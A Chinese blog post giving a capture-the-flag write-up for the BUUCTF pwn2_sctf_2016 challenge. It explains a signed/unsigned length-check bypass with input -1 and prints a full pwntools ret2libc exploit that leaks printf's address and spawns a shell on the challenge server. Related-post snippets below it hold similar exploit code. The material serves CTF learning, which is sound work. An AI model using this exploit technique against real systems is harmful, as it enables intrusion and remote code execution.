BUUCTF-pwn2_sctf_2016

最新推荐文章于 2025-03-21 09:47:34 发布
原创 最新推荐文章于 2025-03-21 09:47:34 发布 · 202 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#算法 #pwn #linux

本文介绍了一个CTF挑战赛中的pwn2_sctf_2016题目的解题思路及EXP代码实现。通过利用-1输入绕过长度限制,结合printf函数泄露libc地址,最终使用system调用/bin/sh获得shell。适用于想要了解CTF安全挑战赛中pwn题目解法的学习者。

1.chwcksec

2.IDA

无符号Int,输入-1进行溢出 ,绕过长度限制

利用printf函数泄露libc,利用system('bin/sh') 

3.EXP

from pwn import *
from LibcSearcher import *

r=remote("node4.buuoj.cn",27523)
elf=ELF('./pwn2_sctf_2016')

printf_plt=elf.plt['printf']
printf_got=elf.got['printf']
main=elf.sym['main']

r.recvuntil('How many bytes do you want me to read? ')
r.sendline('-1')
r.recvuntil('\n')
payload='a'*(0x2c+4)+p32(printf_plt)+p32(main)+p32(printf_got)
r.sendline(payload)
r.recvuntil('\n')
printf_addr=u32(r.recv(4))
libc=LibcSearcher('printf',printf_addr)

offset=printf_addr-libc.dump('printf')
system=offset+libc.dump('system')
bin_sh=offset+libc.dump('str_bin_sh')

r.recvuntil('How many bytes do you want me to read? ')
r.sendline('-1')
r.recvuntil('\n')
payload='a'*(0x2c+4)+p32(system)+p32(main)+p32(bin_sh)
r.sendline(payload)

r.interactive()

在读入的时候输入-1,具体交互

BUUCTF pwn pwn2_sctf_2016
菜的只能随便写写博客
02-18 2690
0x01 分析   0x02 运行  程序读入一个长度,然后按照长度读入后面输入的data并回显。   0x03 IDA  数据长度被限制为32,无法溢出,接着查看get_n函数。  接受a2个长度的字符串并放到vuln函数的缓冲区内部,但是a2传入的值类型是unsigned int,而前面判断长度的类型是int,可以规避长度限制。   0x04 思路  输入负数长度,绕过长度检查,执行r...
[BUUCTF-pwn]——pwn2_sctf_2016
Y_peak的博客
02-12 791
[BUUCTF-pwn]——pwn2_sctf_2016 题目地址: https://buuoj.cn/challenges#pwn2_sctf_2016 老规矩还是先checksec一下, 在IDA中看看, 这个get_n(a, b)的作用就是读入 b 个字符。将其合成的字符串赋值给a。 最常用的方法,也是我经常使用的方法就是利用 libc库 计算偏移。然后循环利用函数。只有printf函数可以打印, 找到需要用的地址。 思路 利用printf泄露printf的实际地址, 通过计算偏移,以此
BUUCTF pwn2_sctf_2016
2401_88087539的博客
02-24 453
pwn新手小白,写完题后整理的一点点思路,有借鉴其他wp,有任何问题各位师傅可以提出,接收批评指正
BUUCTF Pwn pwn2_sctf_2016
MrTreebook的博客
03-13 432
BUUCTF Pwn pwn2_sctf_20161.checksec2.IDA32vuln函数漏洞利用3.exp 1.checksec 没有canary,方便溢出 没有PIE,构造ROP会方便很多 2.IDA32 vuln函数 int vuln() { char nptr[32]; // [esp+1Ch] [ebp-2Ch] BYREF int v2; // [esp+3Ch] [ebp-Ch] printf("How many bytes do you want me to rea
BUUCTF pwn2_sctf2016
红叶的博客
11-01 640
本题难点:绕过字符串大小限制以及是否掌握了ret2libc。
BUUCTF-PWN题详解(pwn1_sctf_2016 1&jarvisoj_level0 1)
2302_80325559的博客
11-27 2653
今天给大家介绍了几个危险函数strcpy、read,以及Python pwn模块的一些函数用法。这几天也做了这六道溢出的题,思路大差不差,都是先找从哪儿溢出,然后后门的地址。如果大家可以自己独立做出来的话,就可以说只要以后见到这种题,分分钟拿下。后面的题就不会留这么明显的后门给我们了,会让我们自己创建后门,难度会大一点点。我尽量以简洁的语言给大家说清楚,大家一起加油!
BUUCTF-PWN】5-pwn1_sctf_2016
燕麦葡萄干的博客
07-04 349
变量s在栈中的位置位0x3c,想要溢出到Rbp需要60+4(因为是32位)=64。fgets()函数只允许输入32位长度,但是I可以变为you,因此可以输入20个I加三个a。这里中间处理的代码还看不太懂,只能看到you、i还有replace字符替换函数。试着运行效果如下,可知代码会把输入的I替换为you。找一下后门函数,函数的位置是0x8048F0D。strcpy()函数存在缓冲区溢出。32位,开启了NX保护。
buuctf pwn1_sctf_2016
最新发布
A_fish_like_sing的博客
03-21 264
buu ctf pwn1_sctf_2016
【CTF】pwn2_sctf_2016
凉水的博客
07-16 1115
pwn2_sctf_2016
pwn2_sctf_2016
、moddemod
06-20 427
exp #!/usr/bin/env python # coding=utf-8 from pwn import * from LibcSearcher import * context(log_level='debug') proc_name = './pwn2_sctf_2016' p = process(proc_name) # p = remote('node3.buuoj.cn', 26254) elf = ELF(proc_name) p.sendlineafter('read?', '-.
buuctf pwn2_sctf_2016
qq_42728977的博客
03-21 690
pwn2_sctf_2016 degree of difficulty: 2 source of the challenges:buuctf/sctf_2016 solving ideas:Stack overslow,atoi-function’s negative number overslow Put it in IDA32,we can see this easy program. l...
buuctf pwn2_sctf_2016
carol2358的博客
04-22 318
32的libc rop 64位是7f(8位),32位是f7(4位) exp: from pwn import * from LibcSearcher import * local_file = './pwn2_sctf_2016' local_libc = '/usr/lib/x86_64-linux-gnu/libc-2.29.so' remote_libc = './libc.s...
[BUUCFT]PWN——pwn2_sctf_2016
BangSen1的博客
04-03 615
pwn2_sctf_2016 例行检查,32位,开启了NX保护。 运行一下 用IDA打开。main函数调用了vuln函数 接受a2个长度的字符串并放到vuln函数的缓冲区内部,但是a2传入的值类型是unsigned int,而前面判断长度的类型是int,这边可以输入负数来达到溢出的效果(整数溢出) 我们可以通过,输入负数,绕过长度限制,造成溢出,再利用printf函数泄露程序的libc版本,去算出system和‘/bin/sh‘的地址,最后溢出覆盖返回地址去执行system(‘/bin/sh’) f
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值